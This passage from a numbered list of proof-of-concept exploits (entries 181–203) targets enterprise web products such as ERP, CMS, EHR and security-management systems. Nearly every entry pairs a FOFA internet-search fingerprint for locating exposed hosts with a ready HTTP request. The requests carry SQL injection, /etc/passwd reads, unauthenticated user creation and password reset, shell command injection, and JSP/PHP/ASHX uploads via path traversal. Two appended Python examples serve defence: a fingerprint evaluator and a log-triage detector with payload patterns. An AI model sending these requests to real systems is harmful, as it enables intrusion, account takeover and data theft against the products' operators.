Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. ESAFENET (亿赛通) Electronic Document Security Management System NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
Send the path exactly as shown, including the js/../ segment. Time-based blind injection (MSSQL waitfor delay): a vulnerable host answers about 5 seconds late.
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. FuTong TianXia (富通天下) Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
The name=.ashx query parameter supplies the stored extension; the body is a minimal ASP.NET handler that writes "test".
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;

public class AverageHandler : IHttpHandler
{
    public bool IsReusable { get { return true; } }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. Hillstone (山石网科) Yunjian (云鉴) Security Management System setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
Step 1: request a token using a client-chosen PHPSESSID:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2: post the token as token_csrf with the same cookie. The param value is executed server-side; here os.system() writes a marker into a file under the web root:
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3: fetch the marker file; if the response contains 23333333333456 the command ran:
GET /master/img/config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0

194. FE Enterprise Operations Management Platform (飞企互联) uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
Check: if a request to /servlet/uploadAttachmentServlet returns a response, the vulnerable servlet is exposed. The filename uses directory traversal so the JSP is written into the deployed fe.war.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 (Volans) Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
The name field is spliced into a shell command (here ;uname -a;echo ).
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: your-ip
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan Fengsu Technology (风速科技) Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
xgh identifies the account whose password is set to newPass; the request carries no session or credentials.
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. Zheda Ente (浙大恩特) Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
Union-based: a vulnerable host echoes the computed value 12321 (111*111). Send the path with the ;.js suffix as shown.
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. Aliyun Drive (阿里云盘) WebDAV LuCI app command injection
CVE-2024-29640
The sid value decodes to `ls />/www/aaa.txt` ; the backticks are expanded by the shell. sysauth is a LuCI session cookie (the value below is a sample).
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Host: your-ip
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

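The FOFA lines in this list are written for internet-wide search, but a defender usually wants to run the same fingerprints against responses from hosts they already own. The following is an added example for this page (not FOFA's matching engine and not the original author's code) that evaluates the subset of the query grammar these entries use: key="value" for substring match, key=="value" for exact match, and terms joined with && or ||, evaluated left to right. app="..." rules depend on FOFA's private rule base, so they evaluate to None (unknown) rather than being guessed. The sample HTML response is constructed.

```python
"""Local evaluator for the FOFA-style fingerprint lines used in this list.

Added example for this page, not FOFA's code or the original author's.
Supported grammar (the subset used by entries 188-203): key="value" (contains),
key=="value" (exact match), terms joined with && or ||, evaluated left to right.
app="..." depends on FOFA's private rule base, so it evaluates to None (unknown).
"""
import re

# One token per call: either an operator (|| / &&) or key="value" / key=="value".
TOKEN_RE = re.compile(r'\s*(?:(\|\||&&)|([a-z_]+)(==|=)"([^"]*)")')


def parse_rule(rule):
    """'body="x" || app="y"' -> [('body', '=', 'x'), '||', ('app', '=', 'y')]."""
    rule = rule.strip()
    tokens, pos = [], 0
    while pos < len(rule):
        m = TOKEN_RE.match(rule, pos)
        if not m:
            raise ValueError("unsupported FOFA syntax near: %r" % rule[pos:])
        tokens.append(m.group(1) if m.group(1) else (m.group(2), m.group(3), m.group(4)))
        pos = m.end()
    return tokens


def response_fields(html):
    """Extract the fields a rule can reference from a raw HTML response body."""
    m = re.search(r"<title[^>]*>(.*?)</title>", html, re.I | re.S)
    return {"title": m.group(1).strip() if m else "", "body": html}


def eval_term(term, fields):
    key, op, value = term
    if key == "app":          # needs FOFA's rule base; cannot be decided locally
        return None
    haystack = fields.get(key, "")
    return haystack == value if op == "==" else value in haystack


def combine(op, left, right):
    """Three-valued logic so an unknown app= term does not hide a body= hit."""
    if op == "||":
        if left is True or right is True:
            return True
        return None if None in (left, right) else False
    if left is False or right is False:
        return False
    return None if None in (left, right) else True


def match_rule(rule, fields):
    tokens = parse_rule(rule)
    result = eval_term(tokens[0], fields)
    for i in range(1, len(tokens), 2):
        result = combine(tokens[i], result, eval_term(tokens[i + 1], fields))
    return result


# Rules copied from the entries in this list (a representative subset).
RULES = {
    "188": 'body="/system/get_rtc_user_defined_info?site_id"',
    "189": 'app="LANWON-临床浏览系统"',
    "190": 'title=="短视频矩阵营销系统"',
    "191": 'body="/CDGServer3/index.jsp"',
    "196": 'body="/cas/themes/zbvc/js/jquery.min.js"',
    "199": 'title="Authenticate Please!"',
    "201": 'body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"',
    "203": 'body="RedseaPlatform"',
}

# Constructed sample response: a login page that would match entries 190 and 191.
SAMPLE_HTML = (
    "<html><head><title>短视频矩阵营销系统</title></head>"
    '<body><a href="/CDGServer3/index.jsp">login</a></body></html>'
)


def triage_page(html, rules=RULES):
    """Map each entry id to True (matched), False (no match) or None (undecidable)."""
    fields = response_fields(html)
    return {entry: match_rule(rule, fields) for entry, rule in rules.items()}


if __name__ == "__main__":
    for entry, verdict in sorted(triage_page(SAMPLE_HTML).items()):
        print(entry, verdict)
```

A None verdict is the signal to check the host by other means (version banner, vendor-specific paths) rather than to discard it; the body= half of a mixed rule is still decided locally.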
199. Cockpit assetsmanager/upload file upload
FOFA:title="Authenticate Please!"
Step 1: request the login page to obtain the csfr token (the parameter is spelled csfr in the application):
GET /auth/login?to=/ HTTP/1.1
Host: your-ip

Response: 200, body contains csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

Step 2: log in with that token to obtain a session cookie (credentials admin/admin here):
POST /auth/check HTTP/1.1
Host: your-ip
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

Step 3: upload with the session cookie; the file is then served from /storage/uploads/tttt.php (it prints tttt and deletes itself):
POST /assetsmanager/upload HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋CMS) dmku SQL injection
FOFA:app="海洋CMS"
Time-based blind injection (MySQL sleep): a vulnerable host answers about 5 seconds late.
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. Founder (方正) Omnimedia News Editing System binary.do SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
The injection point is TableName (stacked queries, MSSQL WAITFOR DELAY): a vulnerable host answers about 5 seconds late.
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. Weiqing (微擎) system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Step 1: fetch the form to obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Step 2: replace __VIEWSTATE and __EVENTVALIDATION below with the values obtained; the uploaded file is then served from /_data/Uploads/1123.txt:
POST /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. Redsea (红海云) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
The part is declared as image/jpeg but carries a JSP with a .jsp filename; the Content-Length below matches the body as written.
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

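To turn the request patterns in entries 188-203 into something a defender can run over web access logs, here is an added example written for this page (it is not part of the original post and not any vendor's code). It parses constructed Apache/Nginx combined-format log lines, URL-decodes the request target, and matches it against an indicator table derived from the paths and payload markers shown above. POST bodies never reach an access log, so rules for body-carried payloads (poihuoqu, NavigationAjax, setSystemTimeAction, uploadAttachmentServlet, resetPasswordBySuper, assetsmanager/upload, binary.do, AccountEdit) flag the endpoint for review rather than as a confirmed payload; the remaining rules look for the POC's own marker in the query string.

```python
"""Access-log triage for the request patterns in entries 188-203 of this list.

Added example for this page, not code from the original post or any vendor.
Input: Apache/Nginx combined-format lines (constructed samples below).
Each indicator pairs a path fragment with an optional payload marker taken from
the POC shown in the entry; POST bodies never reach an access log, so rules
without a marker only flag the endpoint for review.
"""
import re
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# (entry, lower-cased path fragment, payload regex on the decoded target or None)
INDICATORS = [
    ("188", "/attachment", re.compile(r"file=.*(?:/etc/passwd|\.\./)", re.I)),
    ("189", "/xds/deletestudy.php", re.compile(r"waitfor\s+delay|sleep\(", re.I)),
    ("190", "/admin/userinfo/poihuoqu", None),
    ("191", "/navigationajax", None),
    ("192", "/joinfapp/email/uploademailattr", re.compile(r"name=\.?ashx", re.I)),
    ("193", "/master/ajaxactions/setsystemtimeaction.php", None),
    ("194", "/servlet/uploadattachmentservlet", None),
    ("195", "/send_order.cgi", re.compile(r"parameter=operation", re.I)),
    ("196", "/cas/userctl/resetpasswordbysuper", None),
    ("197", "/entsoft/quotegask_editaction.entweb", re.compile(r"union\s+(?:all\s+)?select", re.I)),
    ("198", "/aliyundrive-webdav/query", re.compile(r"sid=[^&]*[`$;|]", re.I)),
    ("199", "/assetsmanager/upload", None),
    ("200", "/dmplayer/dmku/", re.compile(r"sleep\(|benchmark\(|waitfor", re.I)),
    ("201", "/newsedit/newsplan/task/binary.do", None),
    ("202", "/user/accountedit.aspx", None),
    ("203", "/redseaplatform/ptfjk.mob", re.compile(r"method=upload", re.I)),
]


def parse_line(line):
    """Return the log fields as a dict (with a decoded target), or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode twice so a double-encoded payload (%2527 -> %27 -> ') is still visible.
    rec["decoded"] = unquote_plus(unquote_plus(rec["target"]))
    return rec


def match_indicators(rec):
    """List of (entry, confidence) for one parsed record."""
    hits = []
    lowered = rec["decoded"].lower()
    for entry, path, payload in INDICATORS:
        if path not in lowered:
            continue
        if payload is None:
            hits.append((entry, "review"))      # endpoint seen; body not visible in the log
        elif payload.search(rec["decoded"]):
            hits.append((entry, "payload"))     # the POC's own marker is present
    return hits


def triage(lines):
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for entry, confidence in match_indicators(rec):
            findings.append({"entry": entry, "confidence": confidence,
                             "ip": rec["ip"], "status": rec["status"], "target": rec["target"]})
    return findings


# Constructed sample lines; the request targets are those of the entries above.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jun/2024:08:01:02 +0800] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 1714',
    '203.0.113.5 - - [10/Jun/2024:08:01:09 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 312',
    '198.51.100.7 - - [10/Jun/2024:08:02:15 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1" 200 45',
    '198.51.100.7 - - [10/Jun/2024:08:03:01 +0800] "POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1" 200 88',
    '192.0.2.9 - - [10/Jun/2024:08:04:44 +0800] "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 0',
    '192.0.2.9 - - [10/Jun/2024:08:05:10 +0800] "GET /index.php HTTP/1.1" 200 5120',
    '192.0.2.9 - - [10/Jun/2024:08:05:12 +0800] "GET /User/AccountEdit.aspx HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["confidence"], "entry", f["entry"], f["ip"], f["target"])
```

For the time-based injections (189, 191, 200, 201) the strongest corroboration is response time, which the combined format does not record; if your log format includes request duration, a "payload" hit with a delay of about 5 seconds is a near-certain positive. A "review" hit on a legitimate admin endpoint such as /User/AccountEdit.aspx needs the client IP and the 200/302 status to be read in context, which is why those fields are carried along.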